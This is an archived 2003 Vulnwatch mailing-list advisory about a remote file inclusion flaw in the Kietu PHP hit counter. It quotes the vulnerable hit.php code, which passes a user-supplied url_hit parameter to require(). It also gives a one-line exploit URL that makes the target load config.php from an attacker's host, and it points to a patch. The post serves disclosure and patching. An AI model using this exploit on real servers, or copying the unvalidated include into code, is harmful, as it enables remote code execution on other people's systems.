Vulnwatch mailing list archives

Previous By Date Next
Previous By Thread Next

Kietu ( PHP )

From: "Frog Man" <leseulfrog () hotmail com>
Date: Sat, 15 Feb 2003 10:38:40 +0100


Informations :
°°°°°°°°°°°°°°
Website : http://kietu.free.fr
Version : 2.0, 2.3
Problem : Include file


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
hit.php :
------------------------------------------------------------------
if (!get_cfg_var("register_globals")) {
$kietu["remote_addr"] = $HTTP_SERVER_VARS["REMOTE_ADDR"];
$kietu["http_user_agent"] = $HTTP_SERVER_VARS["HTTP_USER_AGENT"];
$kietu["website"] = $HTTP_GET_VARS["website"];
$kietu["appel"] = $HTTP_GET_VARS["appel"];
$kietu["http_referer"] = $HTTP_SERVER_VARS["HTTP_REFERER"];
$kietu["php_self"] = $HTTP_SERVER_VARS["PHP_SELF"];
$kietu["url_hit"] = $HTTP_GET_VARS["url_hit"].$url_hit;
}
else {
$kietu["remote_addr"] = $REMOTE_ADDR;
$kietu["http_user_agent"] = $HTTP_USER_AGENT;
$kietu["website"] = $website;
$kietu["appel"] = $appel;
$kietu["http_referer"] = $HTTP_REFERER;
$kietu["php_self"] = $PHP_SELF;
$kietu["url_hit"] = $url_hit;
}

require ($kietu["url_hit"]."config.php");
------------------------------------------------------------------



Exploit :
°°°°°°°°°
http://[target]/hit.php?url_hit=http://[attacker]/
with :
http://[attacker]/config.php


Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.org


More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/5holes8.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools
This hole was published in "the Hackademy Journal 01", october 2002 (http://www.dmpfrance.com). 



frog-m@n




_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous ! http://search.fr.msn.be
Previous By Date Next
Previous By Thread Next

Current thread: